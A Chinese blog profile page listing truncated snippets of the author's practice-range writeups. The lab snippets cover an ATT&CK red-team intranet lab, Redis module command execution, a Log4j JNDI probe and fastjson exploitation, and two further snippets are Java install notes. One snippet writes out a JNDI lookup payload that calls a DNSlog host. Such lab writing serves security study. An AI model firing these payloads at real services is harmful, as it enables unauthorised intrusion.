简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
内网渗透学习过程,简单记录一下靶场下载地址:今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示:靶场提供的三个主机在同一个
vps:腾讯云 centos8本地:windows11靶场环境:http://123.58.236.76:47109/在vps上执行以下命令git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommandcd RedisModules-ExecuteCommand/make编译之后继续执行命令git clone https://gi
vps:centos8 腾讯云本地:windows11靶场环境:http://123.58.236.76:64936/访问靶场环境http://123.58.236.76:64936/点击???burp抓包,DNSlog验证漏洞是否存在构造payload=${jndi:ldap://7272sq.ceye.io},并在burp中请求数据,返回400payload=${jndi:ldap://727
vps:centos8腾讯云本地:windows11靶场环境:http://123.58.236.76:24477/访问靶场环境:http://123.58.236.76:24477/burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述
卸载老版本1.卸载可能存在的CentOS自带的java环境#rpm -qa|grep java#rpm -qa|grep jdk#rpm -qa|grep gcj2.如果有,卸载#rpm -e --nodeps java–1.8.xxxxxxxxxxxxxxxxxxxxxxxxxxx安装1.下载java二进制包https://www.oracle.com/,jdk-8u241-linux-x64.
百度网盘链接:链接:https://pan.baidu.com/s/1AKS54jtyN6Ohkt1VDZ0Jiw提取码:v73p下载之后解压,解压之后会有两个文件点击jdk-18_windows-x64_bin.exe进行安装然后对应的安装目录查看是否有jdk的文件打开该文件夹,看是否有jre文件夹,我这里就没有没有jre文件参考大佬的方案:https://blog.csdn.net/qq_41